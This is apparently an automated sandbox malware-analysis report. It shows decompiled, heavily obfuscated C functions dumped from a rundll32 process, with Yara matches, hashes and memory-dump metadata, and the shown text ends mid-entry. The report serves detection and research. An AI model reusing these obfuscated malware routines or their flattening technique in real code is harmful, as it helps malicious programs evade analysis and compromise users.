                                                                      • Instruction Fuzzy Hash: 21F122B1508380CFE368DF25C589A5BBBE1BBC5758F108A1DF1DA962A0C7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0200D70B(intOrPtr __ecx, void* __edx) {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				void* _t250;
                                                                      				intOrPtr _t253;
                                                                      				intOrPtr* _t256;
                                                                      				intOrPtr _t257;
                                                                      				intOrPtr _t258;
                                                                      				intOrPtr _t259;
                                                                      				intOrPtr _t262;
                                                                      				signed int _t264;
                                                                      				signed int _t265;
                                                                      				signed int _t266;
                                                                      				signed int _t267;
                                                                      				signed int _t268;
                                                                      				signed int _t269;
                                                                      				signed int _t270;
                                                                      				signed int _t271;
                                                                      				void* _t272;
                                                                      				void* _t301;
                                                                      				intOrPtr* _t307;
                                                                      				void* _t308;
                                                                      				void* _t311;
                                                                      				signed int* _t312;
                                                                      
                                                                      				_t312 =  &_v96;
                                                                      				_v16 = 0xfaeb;
                                                                      				_v16 = _v16 << 5;
                                                                      				_v16 = _v16 ^ 0x001f68fb;
                                                                      				_v20 = 0x715d;
                                                                      				_t311 = __edx;
                                                                      				_t262 = __ecx;
                                                                      				_t307 = 0;
                                                                      				_t264 = 0x69;
                                                                      				_v20 = _v20 / _t264;
                                                                      				_v20 = _v20 ^ 0x00004d95;
                                                                      				_t308 = 0x6d0b453;
                                                                      				_v52 = 0xe4dc;
                                                                      				_v52 = _v52 ^ 0xb66ed69d;
                                                                      				_v52 = _v52 | 0x051c73ce;
                                                                      				_v52 = _v52 ^ 0xb77e6da2;
                                                                      				_v56 = 0xfea7;
                                                                      				_v56 = _v56 | 0x2ac21b6d;
                                                                      				_t265 = 0x28;
                                                                      				_v56 = _v56 / _t265;
                                                                      				_v56 = _v56 ^ 0x0111c769;
                                                                      				_v40 = 0x7de3;
                                                                      				_v40 = _v40 >> 0xc;
                                                                      				_v40 = _v40 ^ 0x00002cee;
                                                                      				_v60 = 0x3598;
                                                                      				_v60 = _v60 + 0xffff8bc6;
                                                                      				_v60 = _v60 + 0xffffa8a6;
                                                                      				_v60 = _v60 ^ 0xffff128a;
                                                                      				_v48 = 0x4fef;
                                                                      				_v48 = _v48 ^ 0xca9c5515;
                                                                      				_v48 = _v48 + 0xb16f;
                                                                      				_v48 = _v48 ^ 0xca9cd0c6;
                                                                      				_v92 = 0xaa9;
                                                                      				_t266 = 0x5f;
                                                                      				_v92 = _v92 / _t266;
                                                                      				_v92 = _v92 + 0xffff3c6a;
                                                                      				_t267 = 0x59;
                                                                      				_v92 = _v92 / _t267;
                                                                      				_v92 = _v92 ^ 0x02e036a9;
                                                                      				_v96 = 0x5de2;
                                                                      				_v96 = _v96 + 0xffffe6a1;
                                                                      				_v96 = _v96 << 0xa;
                                                                      				_v96 = _v96 >> 6;
                                                                      				_v96 = _v96 ^ 0x00042069;
                                                                      				_v36 = 0x38d5;
                                                                      				_v36 = _v36 >> 9;
                                                                      				_v36 = _v36 ^ 0x00004e11;
                                                                      				_v28 = 0x56eb;
                                                                      				_v28 = _v28 | 0x64f5fc98;
                                                                      				_v28 = _v28 ^ 0x64f5ec13;
                                                                      				_v32 = 0x795a;
                                                                      				_v32 = _v32 + 0x3d0e;
                                                                      				_v32 = _v32 ^ 0x0000bf29;
                                                                      				_v24 = 0xb411;
                                                                      				_v24 = _v24 >> 3;
                                                                      				_v24 = _v24 ^ 0x000029d3;
                                                                      				_v88 = 0x662b;
                                                                      				_v88 = _v88 + 0xffff211d;
                                                                      				_v88 = _v88 >> 0xa;
                                                                      				_v88 = _v88 + 0xa5d0;
                                                                      				_v88 = _v88 ^ 0x0040a179;
                                                                      				_v76 = 0x93a7;
                                                                      				_v76 = _v76 | 0xd5df8e88;
                                                                      				_v76 = _v76 >> 4;
                                                                      				_v76 = _v76 ^ 0xa2f79e4d;
                                                                      				_v76 = _v76 ^ 0xafaa69d8;
                                                                      				_v44 = 0x9179;
                                                                      				_v44 = _v44 | 0xc93173a7;
                                                                      				_v44 = _v44 + 0xffff069d;
                                                                      				_v44 = _v44 ^ 0xc930e98d;
                                                                      				_v80 = 0xde50;
                                                                      				_v80 = _v80 << 1;
                                                                      				_v80 = _v80 ^ 0x604d01d6;
                                                                      				_v80 = _v80 | 0x2ae37b3d;
                                                                      				_v80 = _v80 ^ 0x6aefa4f8;
                                                                      				_v84 = 0xd578;
                                                                      				_v84 = _v84 << 0xe;
                                                                      				_t268 = 0x68;
                                                                      				_v84 = _v84 / _t268;
                                                                      				_v84 = _v84 >> 0xb;
                                                                      				_v84 = _v84 ^ 0x0000750e;
                                                                      				_v64 = 0x2e2a;
                                                                      				_v64 = _v64 << 3;
                                                                      				_t269 = 0x30;
                                                                      				_v64 = _v64 / _t269;
                                                                      				_v64 = _v64 + 0xffff5448;
                                                                      				_v64 = _v64 ^ 0xffff6494;
                                                                      				_v68 = 0x2d37;
                                                                      				_t270 = 0xc;
                                                                      				_v68 = _v68 / _t270;
                                                                      				_v68 = _v68 >> 0x10;
                                                                      				_t271 = 0x67;
                                                                      				_v68 = _v68 / _t271;
                                                                      				_v68 = _v68 ^ 0x00004502;
                                                                      				_v12 = 0x26d1;
                                                                      				_v12 = _v12 << 0xc;
                                                                      				_v12 = _v12 ^ 0x026d46c6;
                                                                      				_v72 = 0x25a0;
                                                                      				_v72 = _v72 * 0x64;
                                                                      				_v72 = _v72 << 0xf;
                                                                      				_v72 = _v72 | 0x287c3bd2;
                                                                      				_v72 = _v72 ^ 0x797c3acd;
                                                                      				_v4 = 0x7952;
                                                                      				_v4 = _v4 * 0x12;
                                                                      				_v4 = _v4 ^ 0x0008812f;
                                                                      				_v8 = 0x95b5;
                                                                      				_v8 = _v8 + 0xffff9cc1;
                                                                      				_v8 = _v8 ^ 0x000073a2;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t250 = 0x6ec61ec;
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t272 = 0x5c1247c;
                                                                      						do {
                                                                      							L3:
                                                                      							while(_t308 != 0x28e0d0b) {
                                                                      								if(_t308 == 0x57801b6) {
                                                                      									return E01FFDE81(_v4, _t307, _v8);
                                                                      								}
                                                                      								if(_t308 == _t272) {
                                                                      									 *((intOrPtr*)(_t307 + 0x44)) = _t262;
                                                                      									_t253 =  *0x2011084;
                                                                      									 *_t307 = _t253;
                                                                      									 *0x2011084 = _t307;
                                                                      									return _t253;
                                                                      								}
                                                                      								if(_t308 == 0x6d0b453) {
                                                                      									_push(_t272);
                                                                      									_t301 = 0x50;
                                                                      									_t256 = E01FF54FB(_t301);
                                                                      									_t307 = _t256;
                                                                      									__eflags = _t307;
                                                                      									if(__eflags == 0) {
                                                                      										return _t256;
                                                                      									}
                                                                      									_t308 = 0x22b948bf;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										_t250 = 0x6ec61ec;
                                                                      										L2:
                                                                      										_t272 = 0x5c1247c;
                                                                      										goto L3;
                                                                      									}
                                                                      								}
                                                                      								if(_t308 == _t250) {
                                                                      									_push(E0200C192);
                                                                      									_push(_v84);
                                                                      									_push(_t272);
                                                                      									_push(_v80);
                                                                      									_push(_v44);
                                                                      									_t257 = E01FF903E(_t307, _v76);
                                                                      									_t312 = _t312 - 0xc + 0x20;
                                                                      									 *((intOrPtr*)(_t307 + 0x28)) = _t257;
                                                                      									__eflags = _t257;
                                                                      									_t272 = 0x5c1247c;
                                                                      									_t250 = 0x6ec61ec;
                                                                      									_t308 =  !=  ? 0x5c1247c : 0x28e0d0b;
                                                                      									continue;
                                                                      								}
                                                                      								if(_t308 == 0x206c9a2f) {
                                                                      									_t258 = E01FF3B5C( *((intOrPtr*)(_t307 + 8)), _v24, _v88);
                                                                      									_t312 =  &(_t312[1]);
                                                                      									 *((intOrPtr*)(_t307 + 0x18)) = _t258;
                                                                      									__eflags = _t258;
                                                                      									_t250 = 0x6ec61ec;
                                                                      									_t308 =  !=  ? 0x6ec61ec : 0x28e0d0b;
                                                                      									goto L2;
                                                                      								}
                                                                      								_t321 = _t308 - 0x22b948bf;
                                                                      								if(_t308 != 0x22b948bf) {
                                                                      									goto L18;
                                                                      								}
                                                                      								_push(_t272);
                                                                      								_t259 = E01FF5B7D(_v52, _t311, _t321, _v56, _v40, _v60);
                                                                      								_t312 =  &(_t312[4]);
                                                                      								 *((intOrPtr*)(_t307 + 8)) = _t259;
                                                                      								if(_t259 == 0) {
                                                                      									_t308 = 0x57801b6;
                                                                      								} else {
                                                                      									E01FF5696(_v48,  *((intOrPtr*)(_t307 + 8)), _v92, _v96,  *((intOrPtr*)(_t307 + 8)), _v36);
                                                                      									_push(_v32);
                                                                      									E02001A48( *((intOrPtr*)(_t307 + 8)));
                                                                      									_t312 =  &(_t312[5]);
                                                                      									_t308 = 0x206c9a2f;
                                                                      								}
                                                                      								goto L1;
                                                                      							}
                                                                      							E0200A8BF(_v64, _v68, _v12, _v72,  *((intOrPtr*)(_t307 + 8)));
                                                                      							_t312 =  &(_t312[3]);
                                                                      							_t308 = 0x57801b6;
                                                                      							_t250 = 0x6ec61ec;
                                                                      							_t272 = 0x5c1247c;
                                                                      							L18:
                                                                      							__eflags = _t308 - 0x6c42194;
                                                                      						} while (__eflags != 0);
                                                                      						return _t250;
                                                                      					}
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
                                                                      • API String ID: 0-2837054829
                                                                      • Opcode ID: 8e7021d6a34b11ab96211253f25dfe9ee973c5fe254ca709f16987079b6db6d9
                                                                      • Instruction ID: 4d0b841429b6098b62df4eedf40d266c8925949929ff312b57725fe9ca71df9d
                                                                      • Opcode Fuzzy Hash: 8e7021d6a34b11ab96211253f25dfe9ee973c5fe254ca709f16987079b6db6d9
                                                                      • Instruction Fuzzy Hash: 99C166719083419FE358CF65C88940BBBF2FBD5758F004A2DF59A962A0D3B6D919CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
                                                                      • API String ID: 0-2837054829
                                                                      • Opcode ID: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
                                                                      • Instruction ID: 49911e5b6def33a48648aaba7dbf1b758e87598cd779775c0d0a8bb4bdf7f1af
                                                                      • Opcode Fuzzy Hash: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
                                                                      • Instruction Fuzzy Hash: 60C18671A183419FD358CF25C88A40BBBF2FBD4704F104A2DF59A962A0D3B6D959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E01FF3B74() {
                                                                      				signed int _v4;
                                                                      				intOrPtr _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				void* _t230;
                                                                      				intOrPtr* _t236;
                                                                      				signed int _t239;
                                                                      				intOrPtr* _t241;
                                                                      				signed int _t242;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				signed int _t245;
                                                                      				signed int _t246;
                                                                      				void* _t247;
                                                                      				void* _t273;
                                                                      				signed int* _t277;
                                                                      
                                                                      				_t277 =  &_v104;
                                                                      				_v8 = 0x3773eb;
                                                                      				_v4 = 0;
                                                                      				_v32 = 0xef71;
                                                                      				_v32 = _v32 | 0x54f813f9;
                                                                      				_v32 = _v32 ^ 0xd4f8fff8;
                                                                      				_v24 = 0x7557;
                                                                      				_v24 = _v24 << 0xf;
                                                                      				_v24 = _v24 ^ 0x3aab8002;
                                                                      				_v40 = 0xe4a5;
                                                                      				_v40 = _v40 + 0xc2ea;
                                                                      				_v40 = _v40 ^ 0x0001a89f;
                                                                      				_v92 = 0x30e1;
                                                                      				_v92 = _v92 << 5;
                                                                      				_v92 = _v92 << 5;
                                                                      				_v92 = _v92 | 0xbe715f5e;
                                                                      				_v92 = _v92 ^ 0xbef39162;
                                                                      				_v96 = 0x800f;
                                                                      				_v96 = _v96 >> 0xc;
                                                                      				_v96 = _v96 ^ 0x80e6ae84;
                                                                      				_v96 = _v96 >> 0xe;
                                                                      				_v96 = _v96 ^ 0x00021582;
                                                                      				_v44 = 0x11be;
                                                                      				_v12 = 0;
                                                                      				_t273 = 0x2fb03e9c;
                                                                      				_t242 = 0x1d;
                                                                      				_v44 = _v44 / _t242;
                                                                      				_v44 = _v44 ^ 0x000025b0;
                                                                      				_v52 = 0xe658;
                                                                      				_v52 = _v52 >> 5;
                                                                      				_v52 = _v52 << 0xc;
                                                                      				_v52 = _v52 ^ 0x007363dc;
                                                                      				_v76 = 0x5b3a;
                                                                      				_t243 = 0x5d;
                                                                      				_v76 = _v76 * 0x4c;
                                                                      				_v76 = _v76 ^ 0x14ef7786;
                                                                      				_v76 = _v76 ^ 0x3048edb2;
                                                                      				_v76 = _v76 ^ 0x24bca182;
                                                                      				_v80 = 0xa333;
                                                                      				_v80 = _v80 / _t243;
                                                                      				_v80 = _v80 >> 0xd;
                                                                      				_v80 = _v80 | 0x62916cec;
                                                                      				_v80 = _v80 ^ 0x629113ba;
                                                                      				_v28 = 0x738c;
                                                                      				_v28 = _v28 + 0xfffff99e;
                                                                      				_v28 = _v28 ^ 0x00000a6b;
                                                                      				_v56 = 0x3e6f;
                                                                      				_t244 = 0xc;
                                                                      				_v56 = _v56 / _t244;
                                                                      				_v56 = _v56 | 0xe9662750;
                                                                      				_v56 = _v56 ^ 0xe9666ada;
                                                                      				_v36 = 0x6860;
                                                                      				_t245 = 0x2d;
                                                                      				_v36 = _v36 / _t245;
                                                                      				_v36 = _v36 ^ 0x00001ef2;
                                                                      				_v84 = 0x885e;
                                                                      				_v84 = _v84 >> 0xf;
                                                                      				_v84 = _v84 << 6;
                                                                      				_v84 = _v84 + 0xffffce7b;
                                                                      				_v84 = _v84 ^ 0xffffd5d3;
                                                                      				_v88 = 0xb8f7;
                                                                      				_v88 = _v88 ^ 0xd543d054;
                                                                      				_v88 = _v88 >> 0xb;
                                                                      				_v88 = _v88 + 0xffffaf1d;
                                                                      				_v88 = _v88 ^ 0x001a1dea;
                                                                      				_v60 = 0x284b;
                                                                      				_v60 = _v60 << 0xc;
                                                                      				_v60 = _v60 >> 4;
                                                                      				_v60 = _v60 ^ 0x00281b1d;
                                                                      				_v72 = 0x3dfc;
                                                                      				_t246 = 0x58;
                                                                      				_t239 = _v12;
                                                                      				_v72 = _v72 / _t246;
                                                                      				_v72 = _v72 + 0x95dc;
                                                                      				_v72 = _v72 ^ 0xd14426bc;
                                                                      				_v72 = _v72 ^ 0xd1448cb1;
                                                                      				_v48 = 0xe934;
                                                                      				_v48 = _v48 | 0xd53a3366;
                                                                      				_v48 = _v48 >> 6;
                                                                      				_v48 = _v48 ^ 0x03548d4a;
                                                                      				_v20 = 0x964c;
                                                                      				_v20 = _v20 * 0x17;
                                                                      				_v20 = _v20 ^ 0x000de1e5;
                                                                      				_v100 = 0x9e1;
                                                                      				_v100 = _v100 ^ 0xf4897f8a;
                                                                      				_v100 = _v100 ^ 0x36e5ee60;
                                                                      				_v100 = _v100 | 0xb880b9d7;
                                                                      				_v100 = _v100 ^ 0xfaecd773;
                                                                      				_v104 = 0xd03a;
                                                                      				_v104 = _v104 ^ 0x48aea30f;
                                                                      				_v104 = _v104 + 0x939c;
                                                                      				_v104 = _v104 >> 2;
                                                                      				_v104 = _v104 ^ 0x122bf007;
                                                                      				_v64 = 0xf900;
                                                                      				_v64 = _v64 | 0x2edbad32;
                                                                      				_v64 = _v64 << 0xf;
                                                                      				_v64 = _v64 | 0x270e07c3;
                                                                      				_v64 = _v64 ^ 0xff9f7a70;
                                                                      				_v68 = 0xa250;
                                                                      				_v68 = _v68 << 0xc;
                                                                      				_v68 = _v68 + 0x89c3;
                                                                      				_v68 = _v68 * 0x55;
                                                                      				_v68 = _v68 ^ 0x5e76c64d;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t247 = 0x5c;
                                                                      					while(1) {
                                                                      						_t230 = 0x2118c244;
                                                                      						do {
                                                                      							L3:
                                                                      							while(_t273 != 0x1831a392) {
                                                                      								if(_t273 == _t230) {
                                                                      									_t236 = E02001EDA(_v100, _t239, _v16, _v104);
                                                                      									_t273 = 0x371ab96e;
                                                                      									__eflags = _t236;
                                                                      									_v12 = 0 | __eflags == 0x00000000;
                                                                      									goto L1;
                                                                      								} else {
                                                                      									if(_t273 == 0x25797f14) {
                                                                      										_t241 =  *0x2011088 + 0x38;
                                                                      										while(1) {
                                                                      											__eflags =  *_t241 - _t247;
                                                                      											if(__eflags == 0) {
                                                                      												break;
                                                                      											}
                                                                      											_t241 = _t241 + 2;
                                                                      											__eflags = _t241;
                                                                      										}
                                                                      										_t239 = _t241 + 2;
                                                                      										_t273 = 0x1831a392;
                                                                      										_t230 = 0x2118c244;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t273 == 0x2fb03e9c) {
                                                                      											_t273 = 0x25797f14;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t273 != 0x371ab96e) {
                                                                      												goto L17;
                                                                      											} else {
                                                                      												E020070CF(_v64, _v68, _v16);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								L9:
                                                                      								return _v12;
                                                                      							}
                                                                      							_push(0x1ff1368);
                                                                      							_push(_v44);
                                                                      							_push(_v96);
                                                                      							_t248 = _v40;
                                                                      							__eflags = E02000A84(E01FF5DFC(_v40, _v92, __eflags), _v52, _v24, _v76, _v80, _v40, _v28, _v40,  &_v16, _v32, _t248, _t248, _v56, _v36, _v84, _v88, _t248, _v60);
                                                                      							_t273 =  ==  ? 0x2118c244 : 0x27c3a10;
                                                                      							E02000D6D(_v72, _v48, _v20, _t231);
                                                                      							_t277 =  &(_t277[0x15]);
                                                                      							_t230 = 0x2118c244;
                                                                      							_t247 = 0x5c;
                                                                      							L17:
                                                                      							__eflags = _t273 - 0x27c3a10;
                                                                      						} while (__eflags != 0);
                                                                      						goto L9;
                                                                      					}
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
                                                                      • API String ID: 0-1983453149
                                                                      • Opcode ID: 181f08a8f52abf32cc5eb9ddeec183e24ba373f3652c12e540c0ea47d89cc883
                                                                      • Instruction ID: 4fb36872f9206da6834c0f12d74c44d7563430d7e722c8a8b184b79bd24cba8f
                                                                      • Opcode Fuzzy Hash: 181f08a8f52abf32cc5eb9ddeec183e24ba373f3652c12e540c0ea47d89cc883
                                                                      • Instruction Fuzzy Hash: ABB113725093809FE359CF25D88A90FBBE2FBC4748F10891DF595962A0D7B5CA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
                                                                      • API String ID: 0-1983453149
                                                                      • Opcode ID: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
                                                                      • Instruction ID: 6958330f4a13b84342e64b1132283f202ed0dd40fa3fe352558143046597ccd0
                                                                      • Opcode Fuzzy Hash: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
                                                                      • Instruction Fuzzy Hash: 7CB133B21193809FE399CF25C88A90BBBE1FBC4748F10891DF595962A0D7B5CA59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E01FF7731(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				unsigned int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				void* _t170;
                                                                      				intOrPtr* _t191;
                                                                      				void* _t193;
                                                                      				intOrPtr _t209;
                                                                      				signed int _t210;
                                                                      				signed int _t211;
                                                                      				signed int _t212;
                                                                      				signed int _t213;
                                                                      				signed int _t214;
                                                                      				void* _t215;
                                                                      				signed int* _t217;
                                                                      
                                                                      				_push(_a20);
                                                                      				_t191 = __edx;
                                                                      				_t215 = __ecx;
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t170);
                                                                      				_v12 = 0x49dec4;
                                                                      				_t209 = 0;
                                                                      				_v8 = 0x408154;
                                                                      				_t217 =  &(( &_v84)[7]);
                                                                      				_v4 = 0;
                                                                      				_v52 = 0x694b;
                                                                      				_t193 = 0x182a63aa;
                                                                      				_v52 = _v52 + 0xffff5e5b;
                                                                      				_v52 = _v52 >> 4;
                                                                      				_v52 = _v52 ^ 0x0fff8bf7;
                                                                      				_v56 = 0x41f7;
                                                                      				_v56 = _v56 + 0x4138;
                                                                      				_t210 = 0x11;
                                                                      				_v56 = _v56 * 0x3c;
                                                                      				_v56 = _v56 ^ 0x001ebd7f;
                                                                      				_v24 = 0x2024;
                                                                      				_v24 = _v24 >> 3;
                                                                      				_v24 = _v24 ^ 0x000030b8;
                                                                      				_v28 = 0xded3;
                                                                      				_v28 = _v28 / _t210;
                                                                      				_v28 = _v28 ^ 0x00001e19;
                                                                      				_v32 = 0xc31c;
                                                                      				_t211 = 9;
                                                                      				_v32 = _v32 * 0x46;
                                                                      				_v32 = _v32 ^ 0x00354647;
                                                                      				_v60 = 0x23e0;
                                                                      				_v60 = _v60 << 0xa;
                                                                      				_v60 = _v60 << 3;
                                                                      				_v60 = _v60 ^ 0x047c537c;
                                                                      				_v64 = 0xeb08;
                                                                      				_v64 = _v64 / _t211;
                                                                      				_v64 = _v64 << 0x10;
                                                                      				_v64 = _v64 ^ 0x1a1d4286;
                                                                      				_v68 = 0x30b7;
                                                                      				_v68 = _v68 | 0x586a18cc;
                                                                      				_v68 = _v68 ^ 0x9b6ff92b;
                                                                      				_v68 = _v68 ^ 0xc305ffb2;
                                                                      				_v84 = 0x4a65;
                                                                      				_t212 = 0x11;
                                                                      				_v84 = _v84 * 0x7e;
                                                                      				_v84 = _v84 + 0x6e5;
                                                                      				_v84 = _v84 ^ 0x53a45cff;
                                                                      				_v84 = _v84 ^ 0x5380fb2a;
                                                                      				_v48 = 0xcc07;
                                                                      				_v48 = _v48 + 0x32ac;
                                                                      				_v48 = _v48 << 3;
                                                                      				_v48 = _v48 ^ 0x0007ae20;
                                                                      				_v72 = 0xea77;
                                                                      				_v72 = _v72 * 0x14;
                                                                      				_v72 = _v72 + 0x41ea;
                                                                      				_v72 = _v72 / _t212;
                                                                      				_v72 = _v72 ^ 0x00013230;
                                                                      				_v16 = 0x78a9;
                                                                      				_v16 = _v16 + 0xaadf;
                                                                      				_v16 = _v16 ^ 0x000171b6;
                                                                      				_v36 = 0x9bd0;
                                                                      				_v36 = _v36 ^ 0xa8005f8b;
                                                                      				_v36 = _v36 | 0xb140c83a;
                                                                      				_v36 = _v36 ^ 0xb940c62b;
                                                                      				_v76 = 0x6529;
                                                                      				_v76 = _v76 + 0x50c8;
                                                                      				_v76 = _v76 | 0xe567bb7e;
                                                                      				_v76 = _v76 ^ 0xe5678af7;
                                                                      				_v20 = 0x8b43;
                                                                      				_v20 = _v20 << 0x10;
                                                                      				_v20 = _v20 ^ 0x8b433351;
                                                                      				_v40 = 0x866a;
                                                                      				_t213 = 0x19;
                                                                      				_t214 = _v16;
                                                                      				_v40 = _v40 / _t213;
                                                                      				_v40 = _v40 >> 3;
                                                                      				_v40 = _v40 ^ 0x00003fe9;
                                                                      				_v44 = 0xef9a;
                                                                      				_v44 = _v44 * 0x21;
                                                                      				_v44 = _v44 << 0xe;
                                                                      				_v44 = _v44 ^ 0xb8b6d4b8;
                                                                      				_v80 = 0x5ae9;
                                                                      				_v80 = _v80 + 0xb2b1;
                                                                      				_v80 = _v80 | 0x3da6d513;
                                                                      				_v80 = _v80 >> 8;
                                                                      				_v80 = _v80 ^ 0x003dfd01;
                                                                      				while(_t193 != 0x182a63aa) {
                                                                      					if(_t193 == 0x251a2d5f) {
                                                                      						_t163 =  &_v40; // 0x354647
                                                                      						E0200B94A(_t209, _t214, _t215, _t193, _t193, _a4, _v72, _v16, _v36, _t193, _v76, _v20,  *_t163, _a20, _v44, _v80);
                                                                      						if(_t191 != 0) {
                                                                      							 *_t191 = _t214;
                                                                      						}
                                                                      						L14:
                                                                      						return _t209;
                                                                      					}
                                                                      					if(_t193 == 0x2efe34a0) {
                                                                      						_push(_t193);
                                                                      						_t209 = E01FF54FB(_t214);
                                                                      						if(_t209 == 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t193 = 0x251a2d5f;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t193 != 0x34522f7d) {
                                                                      						L10:
                                                                      						if(_t193 != 0x226dac5d) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      					_t214 = E0200B94A(0, 0, _t215, _t193, _t193, _a4, _v52, _v56, _v24, _t193, _v28, _v32, _v60, _a20, _v64, _v68);
                                                                      					_t217 =  &(_t217[0xe]);
                                                                      					if(_t214 == 0) {
                                                                      						goto L14;
                                                                      					}
                                                                      					_t193 = 0x2efe34a0;
                                                                      				}
                                                                      				_t193 = 0x34522f7d;
                                                                      				goto L10;
                                                                      			}




































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
                                                                      • API String ID: 0-3391024520
                                                                      • Opcode ID: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
                                                                      • Instruction ID: 4b22808c99a1425bac4c3f91a3df6376c047b37ecc58e1da51c7676ebe7573c6
